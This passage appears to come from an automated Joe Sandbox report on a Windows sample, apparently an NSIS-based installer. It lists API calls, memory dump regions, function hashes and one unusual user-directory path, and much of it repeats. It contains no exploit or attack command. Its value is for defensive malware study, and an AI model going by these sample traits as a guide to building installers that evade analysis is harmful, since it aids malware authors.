                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\fllesskabsejede\Modfaldent
                                                      • API String ID: 1892508949-1663555385
                                                      • Opcode ID: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                      • Instruction ID: af3d40abcb4b92d5c03464ca519eb5fb88e5f0cb8c812bf2788953b75bb9e179
                                                      • Opcode Fuzzy Hash: 4cb2efcab3ed91e86469b60195f9e2d97d0acca59b31887f55ab244e2f30bca3
                                                      • Instruction Fuzzy Hash: B911B231504514EBDF20AFA5CD4169F36A0EF14368B29493FE942B22F1D63E8981DA5D
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 004056CA
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                        • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction ID: a38bd53333deb2965cf6bcfe27cab5e967b0379a0e7dc5bd4266cb97908be95f
                                                      • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                      • Instruction Fuzzy Hash: A901B131200708EFDB204F90DEC0A9B3665FB84750F504036F605761D1D77A8C92AE2D
                                                      APIs
                                                      • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00421F28,?,00000800,00000000,?,00421F28,?,?,Call,?,00000000,004067E1,80000002), ref: 004065B6
                                                      • RegCloseKey.KERNELBASE(?), ref: 004065C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID: Call
                                                      • API String ID: 3356406503-1824292864
                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction ID: 4169300ffd031f607b120f1368fde5344542a6b636238975c7224480bb0190f2
                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                      • Instruction Fuzzy Hash: 93017C72500209BBDF218F55DC09EDB3BA8EB54364F01803AFD1AA2190E778D964DBA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                      • Instruction ID: 24c32228aea39238aae05165091b6f794a4b9b1c66cd55bc1afee76a19a4bada
                                                      • Opcode Fuzzy Hash: 8001648312b76757b4dc2f3646509216fc345bf83ee85411accbee75f523ad1d
                                                      • Instruction Fuzzy Hash: 10A14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856ED856BB281C7786A86DF45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                      • Instruction ID: b8cb9ce97df986fef79018f719ec18ee870a51f75f9c549f23c9243a2682c43e
                                                      • Opcode Fuzzy Hash: 2384488d3f0122d52eec19d06177794e899fdfc3e1a025a719282f78321e7206
                                                      • Instruction Fuzzy Hash: 48912370D04228CBDF28CF98C8947ADBBB1FF44305F14856AD856BB291C778A986DF45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                      • Instruction ID: 4da454054b0c3dd02772a9c96e50ae6a11cdbe5b18e0bc5540401a1e7d1606fc
                                                      • Opcode Fuzzy Hash: 27b0d047e0c308e0b5114cd8a4e3873cb63df72f9853a9642e586e78b8cecf79
                                                      • Instruction Fuzzy Hash: E4813471D04228DBDF24CFA8C8847ADBBB1FF45305F24816AD456BB281C778AA86DF45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                      • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                      • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                      • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                      • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                      • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                      • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                      • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                      • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                      • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                      • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                      • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                      • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004034B2
                                                        • Part of subcall function 0040361D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                      • SetFilePointer.KERNELBASE(00007A7E,00000000,00000000,00414EF0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$CountTick
                                                      • String ID:
                                                      • API String ID: 1092082344-0
                                                      • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction ID: f81ac03ea206090be76b65a385b2ac7d4b581aa0cbae2b80a2d2021fe8c89915
                                                      • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction Fuzzy Hash: 7E319CB2600201EFC7209F29EE859263FA9F740356B55023BF901B22F1CBB59E41DB9C
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402128
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                        • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                        • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 334405425-0
                                                      • Opcode ID: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                      • Instruction ID: 77040aa306750b8c28c9decefed3201328e3be048babc7be2d350fd99aa9233c
                                                      • Opcode Fuzzy Hash: b0b9f58de50adf3bfd6b74d5e3cc97da94eb377dbbb3c3ea9cb598495227c431
                                                      • Instruction Fuzzy Hash: A3219F31904204EADF10AFA5CF89A9E7A71BF44359F30413BE105B91E5CBBD8982DA2D
                                                      APIs
                                                      • GlobalFree.KERNEL32(00550B88), ref: 00401C30
                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree
                                                      • String ID: Call
                                                      • API String ID: 3394109436-1824292864
                                                      • Opcode ID: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                      • Instruction ID: ce9828fb533201d430d1dfc272b0b5c9437a35d96f5815e0f5c69034b7ba0116
                                                      • Opcode Fuzzy Hash: dc8853be1138b779fa27739f63eb55e8c503a151d57956236f417371b8924568
                                                      • Instruction Fuzzy Hash: 0021F372944150EBDB20BBA4DE85A5E33A8AB04714718093FF552F32D0C6BC9C918B9D
                                                      APIs
                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,00000011,00000002), ref: 00402622
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
